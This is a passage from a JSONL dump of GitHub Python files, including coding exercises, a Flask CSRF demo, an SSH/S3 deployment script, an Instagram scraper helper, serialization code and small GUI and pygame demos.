\\nno book found !!\")\n else :\n Top = len(Book)\n print(Book[Top-1])\n for x in range(Top-2,-1,-1):\n print(Book[x])\nprint(25*\"#\",\"|| Book ||\",25*\"#\")\nprint(\"push ☞ 1\\npop ☞ 2\\ndisplay ☞ 3\\nexit ☞ 4\")\nwhile True :\n choice = int(input(\"enter choice : \"))\n if (choice == 1):\n Push(Book)\n elif (choice == 2):\n Pop(Book)\n elif (choice == 3):\n Display(Book)\n elif (choice == 4):\n break\n else :\n print(\"enter a valid choice !!\")\n","repo_name":"alpha2lucifer/Python-programs","sub_path":"folder01/zAssignment_stacks.py","file_name":"zAssignment_stacks.py","file_ext":"py","file_size_in_byte":866,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"5577010895","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def mergeTwoLists(self, list1: Optional[ListNode], list2: Optional[ListNode]) -> Optional[ListNode]:\n merged = ListNode()\n \n curr = merged\n \n while list1 and list2:\n \n if list1.val <= list2.val:\n curr.next = list1\n list1 = list1.next\n else:\n curr.next = list2\n list2 = list2.next\n \n curr = curr.next\n \n if not list1:\n curr.next = list2\n elif not list2:\n curr.next = list1\n \n return merged.next","repo_name":"elvinmirzazada/leetcode-challanges","sub_path":"0021-merge-two-sorted-lists/0021-merge-two-sorted-lists.py","file_name":"0021-merge-two-sorted-lists.py","file_ext":"py","file_size_in_byte":769,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"7662043259","text":"\"\"\"\nHelper functions to manage water data.\n\"\"\"\n\ndef add_data_point(meter=None, event=None, zone1='', zone2='', zone3='', zone4='', date=None):\n \"\"\"\n Adds datapoints to the csv files storing water data, event data, and irrigation\n data.\n\n If meter reading is given, function will write to ../data/water.csv; if event\n is given, function will write to ../data/water-events.csv; if irrigation zone\n data are given, function will write to ../data/water-irrigation.csv. If any\n combination of these are given, function will write to all relevant files.\n\n If no date is given, the function will automatically use today's date.\n\n Parameters\n ----------\n date (str) : Date to be parsed by dateutil.parser.\n If no value passed, defaults to today's date.\n meter (float) : Meter reading\n event (str) : Description of event that might impact water usage\n zone1 (int) : Duration (minutes) of zone 1\n zone2 (int) : Duration (minutes) of zone 2\n zone3 (int) : Duration (minutes) of zone 3\n zone4 (int) : Duration (minutes) of zone 4\n\n Returns\n -------\n none\n\n \"\"\"\n \n parsed_date = _parse_date(date)\n \n if meter:\n _update_meter(parsed_date, meter, path='data/water.csv')\n if event:\n _update_events(parsed_date, event, path='data/water-events.csv')\n if zone1 or zone2 or zone3 or zone4:\n _update_zones(parsed_date, zone1, zone2, zone3, zone4, path='data/water-irrigation.csv')\n\n return\n\n\ndef _update_meter(parsed_date, meter, path):\n \"\"\"\n Appends `parsed_date` and `meter` to data file at `path`\n\n \"\"\"\n \n f = open(path, 'a')\n f.write(\"{0},{1}\".format(parsed_date, meter))\n f.close()\n\n return\n\n\ndef _update_events(parsed_date, event, path):\n \"\"\"\n Appends `parsed_date` and `meter` to data file at `path`\n \"\"\"\n\n f = open(path, 'a')\n f.write(\"{0},{1}\".format(parsed_date, event))\n f.close()\n \n return\n\n\ndef _update_zones(parsed_date, zone1, zone2, zone3, zone4, path):\n \"\"\"\n Appends `parsed_date`, `zone1`, `zone2`, `zone3`, and `zone4` to file at\n path.\n \"\"\"\n\n f = open(path, 'a')\n f.write(\"{0},{1},{2},{3},{4}\".format(parsed_date, zone1, zone2, zone3, zone4))\n f.close()\n\n return\n\n\ndef _parse_date(date):\n \"\"\"\n Helper function that returns parsed date using dateutil.parser. If \n no value provided, function returns today's day.\n\n Parameters\n ----------\n date (str) : Date to parse\n \n Returns\n -------\n parsed_date (datetime.datetime) : Parsed date\n \"\"\"\n\n from datetime import datetime\n from dateutil import parser\n\n if date: # If a date was passed, valedate it\n parsed_date = parser.parse(date)\n parsed_date = datetime.strftime(parsed_date, '%Y-%m-%d')\n else: # Otherwise, use today's date\n parsed_date = datetime.today().strftime('%Y-%m-%d')\n\n return parsed_date\n","repo_name":"zrottman/data-exploration","sub_path":"water/water_funcs.py","file_name":"water_funcs.py","file_ext":"py","file_size_in_byte":2900,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"75018663127","text":"import sys\nfrom collections import deque\nsys.setrecursionlimit(10 ** 8)\nsys.stdin = open(\"input.txt\", \"r\")\ninput = sys.stdin.readline\n\n\ndef dfs(start, group):\n visited[start] = group\n\n for i in arr[start]:\n if not visited[i]:\n a = dfs(i, -group)\n if not a:\n return False\n elif visited[i] == visited[start]:\n return False\n return True\n\n\nn = int(input())\n\nfor _ in range(n):\n v, e = map(int, input().split()) # 정점의 개수 V와 간선의 개수 E\n arr = [[] for _ in range(v+1)]\n visited = [False] * (v+1)\n\n for _ in range(e):\n a, b = map(int, input().split())\n arr[a].append(b)\n arr[b].append(a)\n\n for i in range(1, v + 1):\n if not visited[i]:\n result = dfs(i, 1)\n if not result:\n break\n print(\"YES\" if result else \"NO\")\n","repo_name":"dongury1114/swjungle_week03_team5","sub_path":"euisung/2022.04.20/1707.py","file_name":"1707.py","file_ext":"py","file_size_in_byte":880,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"23851948305","text":"from OpenGL.GL import glClearDepth, glClearColor, glDepthFunc, glClear, glEnable, glFrontFace, GL_DEPTH_TEST, GL_LEQUAL, GL_COLOR_BUFFER_BIT, GL_DEPTH_BUFFER_BIT, GL_CW, GL_CULL_FACE\nfrom cyglfw3 import GetTime\n\nfrom .node import Node\nfrom .camera import Camera\nfrom odyn.input import Input\n\n\nclass Timer(object):\n def __init__(self):\n self.tick = GetTime()\n self.last_tick = self.tick\n self.delta = 0\n\n def update(self):\n self.last_tick = self.tick\n self.tick = GetTime()\n self.delta = self.tick - self.last_tick\n\n def __repr__(self):\n return \"\".format(self.last_tick, self.tick, self.delta)\n\n\nclass Scene(Node):\n def __init__(self, window):\n self.timer = Timer()\n self.window = window\n super(Scene, self).__init__()\n\n def onInit(self):\n glEnable(GL_DEPTH_TEST)\n glClearDepth(1.0)\n glDepthFunc(GL_LEQUAL)\n\n glEnable(GL_CULL_FACE)\n glFrontFace(GL_CW)\n\n self.cam = Camera(self.window)\n self.timer = Timer()\n\n # Register Input component\n self.components.append(Input(self.window, self))\n\n def onRender(self):\n glClearColor(1.0, 0.0, 1.0, 1.0)\n glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT);\n self.cam.onRender()\n\n def update(self):\n self.timer.update()\n super(Scene, self).update(self.timer)\n","repo_name":"python33/odyn","sub_path":"odyn/scene/scene.py","file_name":"scene.py","file_ext":"py","file_size_in_byte":1412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"21712171499","text":"from flask import Flask\nfrom flask import flash\nfrom flask import request\nfrom flask import current_app\nfrom flask import render_template\nfrom wtforms import ValidationError\nfrom flask_wtf.csrf import CSRFProtect\nfrom flask_wtf.csrf import validate_csrf\n\ncsrf = CSRFProtect()\n\n\napp = Flask(__name__)\napp.config['SECRET_KEY'] = 'secret key'\ncsrf.init_app(app)\n\n\n@app.route('/', methods=('GET', 'POST'))\ndef index():\n if request.method == 'POST':\n current_app.logger.debug(request.values)\n csrf_token = request.values.get('csrf_token')\n try:\n validate_csrf(csrf_token)\n except ValidationError as e:\n current_app.logger.error(e)\n flash(e.args[0])\n else:\n action = request.values.get('action')\n flash(f'{action} successful')\n\n return render_template('index.html')\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n","repo_name":"AngelLiang/Flask-Demos","sub_path":"HT01-flask-post-button/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":909,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"31"} +{"seq_id":"17083757503","text":"import common\nimport wcodegen\n\n\nclass PythonBitmapButtonGenerator(wcodegen.PythonWidgetCodeWriter):\n tmpl = '%(name)s = %(klass)s(%(parent)s, %(id_number)s, ' \\\n '%(bitmap)s%(style)s)\\n'\n\n# end of class PythonBitmapButtonGenerator\n\n\nclass CppBitmapButtonGenerator(wcodegen.CppWidgetCodeWriter):\n tmpl = '%(name)s = new %(klass)s(%(parent)s, %(id_number)s, ' \\\n '%(bitmap)s%(style)s);\\n'\n\n# end of class CppBitmapButtonGenerator\n\n\ndef xrc_code_generator(obj):\n xrcgen = common.code_writers['XRC']\n\n class BitmapButtonXrcObject(xrcgen.DefaultXrcObject):\n def write_property(self, name, val, outfile, tabs):\n if name == 'disabled_bitmap':\n name = 'disabled'\n\n if name in ['bitmap', 'selected', 'focus', 'disabled', 'hover']:\n prop = self._format_bitmap_property(name, val)\n if prop:\n line = '%s%s' % (self.tabs(tabs), prop)\n outfile.write(line)\n return\n\n xrcgen.DefaultXrcObject.write_property(\n self, name, val, outfile, tabs)\n\n # end of class BitmapButtonXrcObject\n\n return BitmapButtonXrcObject(obj)\n\n\ndef initialize():\n klass = 'wxBitmapButton'\n common.class_names['EditBitmapButton'] = klass\n common.register('python', klass, PythonBitmapButtonGenerator(klass))\n common.register('C++', klass, CppBitmapButtonGenerator(klass))\n common.register('XRC', klass, xrc_code_generator)\n","repo_name":"FreePLC/FreePLC_IDE","sub_path":"IDE_Source/python/Lib/site-packages/wxglade/widgets/bitmap_button/codegen.py","file_name":"codegen.py","file_ext":"py","file_size_in_byte":1485,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"31"} +{"seq_id":"15076848028","text":"from tkinter.filedialog import *\nimport PyPDF2\nfrom gtts import gTTS\n\nbook = askopenfilename()\nreader = PyPDF2.PdfFileReader(book)\npages = reader.numPages\nfor page in range(0, pages):\n cur_page = reader.getPage(page)\n mytext = cur_page.extractText()\n #print(mytext)\n audio = gTTS(text = mytext, lang = 'en', slow = False)\n audio.save('try.mp3')\nos.system('try.mp3')\n","repo_name":"etzard-fa/python-playrground","sub_path":"audio-book-from-pdf/audiobook.py","file_name":"audiobook.py","file_ext":"py","file_size_in_byte":381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"32320799989","text":"# coding: utf-8\n\nclass Solution:\n def __init__(self):\n self.cache = {}\n\n # @param n: an integer\n # @return: a boolean which equals to True if the first player will win\n def firstWillWin(self, n):\n # write your code here\n if n == 0:\n return False\n elif n <= 2:\n return True\n if n not in self.cache:\n '''\n 如果n - 3被第一个玩家拿走,\n 那么不管第二个玩家拿1个或2个,\n 第n个一定被第一个玩家拿走。\n '''\n self.cache[n] = self.firstWillWin(n - 3)\n return self.cache[n]\n\n# medium: http://lintcode.com/zh-cn/problem/coins-in-a-line/\n","repo_name":"yingl/LintCodeInPython","sub_path":"coins-in-a-line.py","file_name":"coins-in-a-line.py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"en","doc_type":"code","stars":123,"dataset":"github-code","pt":"31"} +{"seq_id":"74045900888","text":"import paramiko\nfrom os.path import expanduser\nfrom user_definition import *\nimport time\n\n\n# ## Assumption : Anaconda, Git (configured)\n\ndef ssh_client():\n \"\"\"Return ssh client object\"\"\"\n return paramiko.SSHClient()\n\n\ndef ssh_connection(ssh, ec2_address, user, key_file):\n \"\"\"Connect to a specified ec2 instance\"\"\"\n ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n ssh.connect(ec2_address, username=user,\n key_filename=expanduser(\"~\") + key_file)\n print(\"SSH connection done.\")\n return ssh\n\n\ndef create_or_update_environment(ssh):\n \"\"\"Generate or update an enviornment.yml file with all dependencies\"\"\"\n stdin, stdout, stderr = ssh.exec_command(\"sudo yum -y install gcc\")\n stdin, stdout, stderr = \\\n ssh.exec_command(\"conda env create -f \"\n \"~/{}/environment.yml\".format(git_repo_name))\n\n if b'already exists' in stderr.read():\n stdin, stdout, stderr = \\\n ssh.exec_command(\"conda env update -f \"\n \"~/{}/environment.yml\".format(git_repo_name))\n print(\"Git repo cloned/updated.\")\n print(\"Environment created.\")\n\n\ndef git_clone(ssh):\n \"\"\"Clones specified repo if not present, otherwise \\\n updates repo via git pull command\"\"\"\n stdin, stdout, stderr = ssh.exec_command(\"git --version\")\n\n if b\"\" is stderr.read():\n git_clone_command = \"git clone \\\n https://{}@github.com/{}/{}.git\".format(\n git_user_id, git_repo_owner, git_repo_name)\n stdin, stdout, stderr = ssh.exec_command(git_clone_command)\n\n # if git repo already exists, pull\n if b'already exists' in stderr.read():\n cd_and_pull_repo = \"cd {}; git pull\".format(git_repo_name)\n stdin, stdout, stderr = ssh.exec_command(cd_and_pull_repo)\n\n\ndef logout(ssh):\n \"\"\"Close ssh connection\"\"\"\n stdin, stdout, stderr = ssh.exec_command(\"logout\")\n print(\"Logged out.\")\n ssh.close()\n\n\ndef deploy_model(ssh):\n \"\"\"Pull model from S3\"\"\"\n # if aws_access_key_id and aws_secret_access_key:\n # stdin, stdout, stderr = ssh.exec_command(\"mkdir ~/.aws\")\n # if b\"File exists\" not in stderr.read():\n # stdin, stdout, stderr = ssh.exec_command(\n # \"touch ~/.aws/credentials\")\n # stdin, stdout, stderr = ssh.exec_command(\"echo [default] >> \\\n # ~/.aws/credentials\")\n # stdin, stdout, stderr = ssh.exec_command(\"echo aws_access_key_id\n # = \\\n # {} >> ~/.aws/credentials\".format(aws_access_key_id))\n # stdin, stdout, stderr = ssh.exec_command(\"echo\n # aws_secret_access_key = \\\n # {} >> ~/.aws/credentials\".format(aws_secret_access_key))\n # stdin, stdout, stderr = ssh.exec_command(\"rm -rf ~/{}/app/models\".format(\n # git_repo_name))\n # stdin, stdout, stderr = ssh.exec_command(\"mkdir ~/{}/app/models\".format(\n # git_repo_name))\n # else:\n stdin, stdout, stderr = ssh.exec_command(\n \"rm -rf ~/{}/models\".format(git_repo_name))\n stdin, stdout, stderr = ssh.exec_command(\n \"mkdir ~/{}/models\".format(git_repo_name))\n stdin, stdout, stderr = ssh.exec_command(\"~/.conda/envs/armr/bin/aws \\\n s3 ls msds-armr --recursive | sort | tail -n 1 | awk '{print $4}'\")\n model = stdout.read().strip().decode(\"utf-8\")\n\n stdin, stdout, stderr = ssh.exec_command(f\"~/.conda/envs/armr/bin/aws \\\n s3 cp s3://{bucket_name}/{model} ~/{model}\")\n time.sleep(20)\n stdin, stdout, stderr = \\\n ssh.exec_command(\"unzip ~/{} -d \\\n ~/{}/models/\".format(model, git_repo_name))\n print(stdout.read())\n\n\ndef launch_flask(ssh):\n ssh.exec_command(\"chmod u+x /home/ec2-user/ARMR/code/flask.sh\")\n ssh.exec_command(\"bash /home/ec2-user/ARMR/code/flask.sh\")\n print(\"Flask app running on port 80.\")\n\n\ndef main():\n \"\"\"Connect to a specified ec2 instance and create/update a \\\n conda environment\"\"\"\n ssh = ssh_client()\n ssh_connection(ssh, ec2_address, user, key_file)\n git_clone(ssh)\n create_or_update_environment(ssh)\n deploy_model(ssh)\n launch_flask(ssh)\n logout(ssh)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"tylerursuy/ARMR","sub_path":"code/deploy.py","file_name":"deploy.py","file_ext":"py","file_size_in_byte":4221,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"14992836636","text":"from enum import EnumType\nimport json\nimport types\nfrom typing import Any, get_args, get_origin, get_type_hints\n\nfrom .util import (\n SIMPLE_TYPES,\n SerializationError,\n Translated,\n get_type_name,\n verify_type,\n)\n\n\ndef serialize_item(item: Any, expected_type: Any) -> Translated:\n if type(expected_type) == type and expected_type in SIMPLE_TYPES:\n verify_type(item, expected_type)\n return item\n\n if isinstance(expected_type, types.GenericAlias):\n return serialize_generic(item, expected_type)\n if isinstance(expected_type, types.UnionType):\n return serialize_union(item, expected_type)\n if isinstance(expected_type, EnumType):\n return serialize_enum(item, expected_type)\n\n return serialize_object(item, expected_type)\n\n\ndef serialize_enum(item: Any, expected_type: EnumType):\n verify_type(item, expected_type)\n return item.value\n\n\ndef serialize_union(item: Any, type_info: types.UnionType) -> Translated:\n for t in get_args(type_info):\n if isinstance(t, types.GenericAlias):\n try: # check if it's this generic type\n return [get_type_name(t), serialize_generic(item, t)]\n except SerializationError:\n pass\n elif type(item) == t:\n return [get_type_name(t), serialize_item(item, t)]\n\n raise SerializationError(\n f\"Union type {type_info} has failed to serialize: {type(item)} not in union\"\n \" type\"\n )\n\n\ndef serialize_generic(collection: Any, type_info: types.GenericAlias) -> Translated:\n expected_type: Any = get_origin(type_info)\n verify_type(collection, expected_type)\n if expected_type in (list, set):\n item_type = get_args(type_info)[0]\n return [serialize_item(i, item_type) for i in collection]\n if expected_type == dict:\n key_type, value_type = get_args(type_info)\n return [\n [serialize_item(k, key_type), serialize_item(v, value_type)]\n for k, v in collection.items()\n ]\n if expected_type == tuple:\n item_types = get_args(type_info)\n return [serialize_item(i, t) for i, t in zip(collection, item_types)]\n raise SerializationError(f\"Generic type {expected_type} is not supported\")\n\n\ndef serialize_object(data: object, expected_type: type) -> Translated:\n verify_type(data, expected_type)\n type_hints = get_type_hints(type(data))\n out = []\n for name, t in type_hints.items():\n out.append(serialize_item(getattr(data, name), t))\n return out\n\n\ndef serialize(\n data: object,\n set_type: Any | None = None,\n indent: int | None = None,\n) -> str:\n return json.dumps(\n serialize_item(data, set_type if set_type else type(data)), indent=indent\n )\n","repo_name":"fdelu/distribuidos-tp1","sub_path":"src/system/common/serde/internal/serialize.py","file_name":"serialize.py","file_ext":"py","file_size_in_byte":2746,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"72679587288","text":"import customtkinter\ncustomtkinter.set_appearance_mode(\"System\")\ncustomtkinter.set_default_color_theme(\"blue\")\n\nclass App(customtkinter.CTk):\n def __init__(self):\n super().__init__()\n self.title(\"Complex Example\")\n self.geometry(\"1000x500\")\n\n self.grid_rowconfigure(0, weight=1)\n self.grid_columnconfigure(1, weight=1)\n\n self.navigation = NavigationFrame(self, controller=self)\n self.navigation.grid(row=0, column=0, sticky=\"nesw\")\n\n self.frame2 = Frame2(self, controller=self)\n self.frame1 = Frame1(self, controller=self)\n self.frame1.grid(row=0, column=1, sticky=\"nsew\")\n self.frame2.grid(row=0, column=1, sticky=\"nsew\")\n\nclass NavigationFrame(customtkinter.CTkFrame):\n def __init__(self, parent, controller):\n super().__init__(parent)\n\n self.controller = controller\n self.configure(fg_color=\"grey15\")\n\n title = customtkinter.CTkLabel(self, text=\"Navigation\", anchor=\"center\", font=(\"Helvetica\", 20))\n title.grid(row=0, column=0, padx=(20, 20), pady=(15,15))\n\n test1 = customtkinter.CTkButton(self, text=\"Frame 1\", anchor=\"center\", fg_color=\"transparent\", border_color=\"#3B8ED0\", border_width=2, command=self.one_event)\n test1.grid(row=1, column=0, padx=(20, 20), pady=(15,15))\n\n test2 = customtkinter.CTkButton(self, text=\"Frame 2\", anchor=\"center\", fg_color=\"transparent\", border_color=\"#3B8ED0\", border_width=2, command=self.two_event)\n test2.grid(row=2, column=0, padx=(20, 20), pady=(15,15))\n\n def one_event(self):\n self.controller.frame1.tkraise()\n\n def two_event(self):\n self.controller.frame2.tkraise()\n\nclass Frame1(customtkinter.CTkFrame):\n def __init__(self, parent, controller):\n super().__init__(parent)\n\n self.grid_rowconfigure(0, weight=1)\n self.grid_columnconfigure(0, weight=1)\n\n title = customtkinter.CTkLabel(self, text=\"Frame 1!\", anchor=\"center\")\n title.grid(row=0, column=0)\n\nclass Frame2(customtkinter.CTkFrame):\n def __init__(self, parent, controller):\n super().__init__(parent)\n\n self.grid_rowconfigure(0, weight=1)\n self.grid_columnconfigure(0, weight=1)\n\n title = customtkinter.CTkLabel(self, text=\"Frame 2!\", anchor=\"center\")\n title.grid(row=0, column=0)\n\napp = App()\napp.mainloop()\n","repo_name":"SFavela-hub/CustomTkinterBlog","sub_path":"complex.py","file_name":"complex.py","file_ext":"py","file_size_in_byte":2355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"9125099376","text":"import spotipy\r\nimport sys\r\nfrom spotipy.oauth2 import SpotifyClientCredentials\r\n\r\nclass Spotify:\r\n\r\n\tdef __init__(self):\r\n\t\tclient_credentials_manager = SpotifyClientCredentials(client_id='ID', client_secret='ID')\r\n\t\tself.spotify = spotipy.Spotify(client_credentials_manager=client_credentials_manager)\r\n\r\n\tdef find_song(self, song, artist):\r\n\t\tresults = self.spotify.search(q=song, type = 'track')\r\n\t\titems = results['tracks']['items']\r\n\t\tfor index, tracks in enumerate(items):\r\n\t\t\ttrack = items[index]\r\n\t\t\tcurrent_artist = track['artists'][0]['name']\r\n\t\t\tif current_artist == artist:\r\n\t\t\t\treturn track\r\n\r\n\tdef get_recommendations(self, track, genre, limit):\r\n\t\trecommendations = self.spotify.recommendations(seed_tracks = [track['id']], seed_artists = [track['artists'][0]['id']], seed_genres = genre, limit = limit)\r\n\t\ttracks_of_recommend = recommendations['tracks']\r\n\t\treturn tracks_of_recommend\r\n\r\n\tdef get_genres(self):\r\n\t\tgenres = self.spotify.recommendation_genre_seeds()\r\n\t\treturn genres\r\n","repo_name":"stant1er/Bothoven","sub_path":"spotify.py","file_name":"spotify.py","file_ext":"py","file_size_in_byte":999,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"11559554666","text":"def sum_digits(num: int) -> int:\n nums = 0\n while num != 0:\n digit = num % 10\n nums += digit\n num = num // 10\n\n return nums\n\n\nwith open(\"trojki.txt\") as file:\n for line in file:\n a, b, c = map(int, line.strip().split())\n\n if sum_digits(a) + sum_digits(b) == c:\n print(a, b, c)\n","repo_name":"bartekpacia/matura","sub_path":"zbior/66/zad661.py","file_name":"zad661.py","file_ext":"py","file_size_in_byte":335,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"31"} +{"seq_id":"30444982114","text":"import logging\nimport json\nimport time\n\nfrom bs4 import BeautifulSoup\nfrom json.decoder import JSONDecodeError\n\nfrom .. import constants\nfrom .. import actions\n\nlogger = logging.getLogger('__name__')\n\n\nclass GetUserId(actions.Action):\n def __init__(self, scraper, username):\n super().__init__(scraper)\n self.__username = username\n\n def do(self):\n \"\"\" Get the id of a username \"\"\"\n\n # Open new tab and load the link\n link = constants.INSTAGRAM_USER_INFO_URL_DEFAULT.format(self.__username)\n self._web_driver.execute_script(\"window.open('\" + link + \"','_blank');\")\n first_tab_handle = self._web_driver.current_window_handle\n\n # Switch to the new tab\n self._web_driver.switch_to.window(self._web_driver.window_handles[1])\n time.sleep(2)\n\n # Get data\n result = self._scraper.web_driver.page_source\n soup = BeautifulSoup(result, 'html.parser')\n\n # Close the the new tab\n self._web_driver.close()\n self._web_driver.switch_to.window(first_tab_handle)\n time.sleep(2)\n\n try:\n data = json.loads(soup.text)\n return data['graphql']['user']['id']\n except (JSONDecodeError, KeyError) as err:\n logger.error('could not retrieve user id: %s' % str(err))\n\n def on_fail(self):\n pass\n","repo_name":"zaironjacobs/instagram-scraper","sub_path":"instagram_scraper/actions/get_user_id.py","file_name":"get_user_id.py","file_ext":"py","file_size_in_byte":1346,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"31"} +{"seq_id":"32008321434","text":"class BankAccount:\n\n def __init__(self, int_rate,balance):\n self.int_rate = int_rate\n self.balance = balance\n\n def with_draw(self,amount):\n # we can use the static method here to evaluate\n # if we can with draw the funds without going negative\n if BankAccount.can_withdraw(self.balance,amount):\n self.balance -= amount\n else:\n print(\"Insufficient Funds\")\n return self\n \n # static methods have no access to any attribute\n # only to what is passed into it\n # use if you need a method that doesn't use self, or cls\n @staticmethod\n def can_withdraw(balance,amount):\n if (balance - amount) < 0:\n return False\n else:\n return True\n \ngarett = BankAccount(0.05, 2000)\nprint(garett.balance)\ngarett.with_draw(100)\nprint(garett.balance)\n","repo_name":"woox99/Python","sub_path":"00_Reference_Library/150_Classes/153_Static_Method/file.py","file_name":"file.py","file_ext":"py","file_size_in_byte":863,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"3111330079","text":"import bisect\n\n\n\ndef test_bisect():\n xs = [1, 2, 3, 4, 5, 6, 6, 7]\n n = 4\n assert bisect.bisect_left(xs, n) == 3\n assert bisect.bisect_left(xs, n, 0) == 3\n assert bisect.bisect_left(xs, n, 0, len(xs)) == 3\n assert bisect.bisect_right(xs, n) == 4\n assert bisect.bisect(xs, n) == 4\n\n bisect.insort_left(xs, n)\n assert xs == [1, 2, 3, 4, 4, 5, 6, 6, 7]\n\n bisect.insort_right(xs, n)\n assert xs == [1, 2, 3, 4, 4, 4, 5, 6, 6, 7]\n\n bisect.insort(xs, n)\n assert xs == [1, 2, 3, 4, 4, 4, 4, 5, 6, 6, 7]\n\n\n\nclass Pair:\n def __init__(self, x, y):\n self.x = x\n self.y = y\n\n @property\n def val(self):\n return (self.x, self.y)\n\n def __repr__(self):\n return \"Pair(%s, %s)\" % (self.x, self.y)\n\n def __lt__(self, other):\n return self.x + self.y < other.x + other.y\n\n def __eq__(self, other):\n return self.x + self.y == other.x + other.y\n\n\n\ndef test_bisect_insort():\n pairs = [[18, 6], [28, 5], [35, 26], [31, 28], [3, 3], [32, 37], [11, 17], [28, 29]]\n items = []\n for pair in pairs:\n bisect.insort(items, Pair(pair[0], pair[1]))\n\n assert items[0].val == (3,3)\n assert items[-1].val == (32, 37)\n assert [i.val for i in items] == [(3, 3), (18, 6), (11, 17), (28, 5), (28, 29), (31, 28), (35, 26), (32, 37)]\n \n\n\ndef test_all():\n test_bisect()\n test_bisect_insort()\n \n\nif __name__ == '__main__':\n test_all() ","repo_name":"shedskin/shedskin","sub_path":"tests/test_mod_bisect/test_mod_bisect.py","file_name":"test_mod_bisect.py","file_ext":"py","file_size_in_byte":1428,"program_lang":"python","lang":"en","doc_type":"code","stars":721,"dataset":"github-code","pt":"31"} +{"seq_id":"3109777949","text":"\"\"\"\r\nPorted from Sean McCullough's Processing code:\r\nhttp://www.cricketschirping.com/processing/CirclePacking1/\r\n\r\nSee also: http://en.wiki.mcneel.com/default.aspx/McNeel/2DCirclePacking\r\nhttp://www.cricketschirping.com/weblog/?p=1047\r\nSee also:\r\nhttp://www.infovis-wiki.net/index.php/Circle_Packing\r\n\r\nOriginal NodeBox code by Tom De Smedt:\r\nhttp://nodebox.net/code/index.php/shared_2008-08-07-12-55-33\r\nLater ported to Python + Psyco + Pygame by leonardo maffi, V.1.0, Apr 14 2009\r\n\"\"\"\r\n\r\nimport sys, os, time\r\nfrom random import randrange\r\n\r\nimport pygame # if pygame is absent this program may just print coords\r\nfrom pygame.locals import QUIT, K_ESCAPE, MOUSEBUTTONDOWN, MOUSEBUTTONUP, MOUSEMOTION\r\n\r\nimport circle\r\n\r\n# to center the window in the screen\r\nif sys.platform == 'win32' or sys.platform == 'win64':\r\n os.environ['SDL_VIDEO_CENTERED'] = '1'\r\n\r\nSCREEN_WIDTH = 900\r\nSCREEN_HEIGHT = 850\r\n\r\n# you can reduce the NCIRCLES if you don't have Psyco or you have a slow PC\r\nNCIRCLES = 120\r\n\r\n# more iterations = smoother physics but slower animation\r\nITERATIONS = 80\r\n\r\nSCREEN_WIDTH_2 = SCREEN_WIDTH / 2\r\nSCREEN_HEIGHT_2 = SCREEN_HEIGHT / 2\r\n\r\ndef clamp(col):\r\n col = int(col)\r\n if col <= 0:\r\n return 0\r\n elif col > 255:\r\n return 255\r\n else:\r\n return col\r\n\r\ndef setup():\r\n global circles, surface, drawsurf, dragged, screen\r\n\r\n pygame.init()\r\n icon = pygame.Surface((1, 1))\r\n icon.set_alpha(0)\r\n pygame.display.set_icon(icon)\r\n screen = (SCREEN_WIDTH, SCREEN_HEIGHT)\r\n\r\n pygame.display.set_caption(\"Circle packing 2\")\r\n surface = pygame.display.set_mode(screen)\r\n\r\n drawsurf = pygame.Surface(screen).convert()\r\n drawsurf.set_colorkey((0, 0, 0))\r\n\r\n circles = []\r\n for i in range(NCIRCLES):\r\n radius = randrange(5, 6 + int(i/1.8))\r\n\r\n r = clamp(radius * 0.02 * 256)\r\n g = clamp((0.2 + radius * 0.03) * 256)\r\n b = 0\r\n a = clamp(0.8 * 256)\r\n c = circle.Circle(randrange(SCREEN_WIDTH), randrange(SCREEN_HEIGHT), radius, (r, g, b, a))\r\n\r\n circles.append(c)\r\n\r\n dragged = None\r\n\r\ndef get_input():\r\n global dragged\r\n key = pygame.key.get_pressed()\r\n\r\n for event in pygame.event.get():\r\n if event.type == QUIT or key[K_ESCAPE]:\r\n pygame.quit()\r\n sys.exit()\r\n elif event.type == MOUSEBUTTONDOWN and dragged is None:\r\n mousex, mousey = pygame.mouse.get_pos()\r\n for circle in circles:\r\n if circle.contains(mousex, mousey):\r\n dragged = circle\r\n elif event.type == MOUSEMOTION and dragged is not None:\r\n # drag objects with the mouse\r\n dragged.x, dragged.y = pygame.mouse.get_pos()\r\n elif event.type == MOUSEBUTTONUP:\r\n dragged = None\r\n\r\ndef run():\r\n global dragged\r\n\r\n iterations = 0\r\n t0 = time.time()\r\n while True:\r\n iterations += 1\r\n if iterations % 10 == 0:\r\n print(time.time()-t0)\r\n t0 = time.time()\r\n get_input()\r\n\r\n surface.fill((0, 0, 0))\r\n drawsurf.fill((0, 0, 0))\r\n\r\n for c in circles:\r\n pygame.draw.circle(drawsurf, pygame.Color(*c.color), (int(c.x), int(c.y)), int(c.radius), 0)\r\n\r\n for i in range(1, ITERATIONS):\r\n 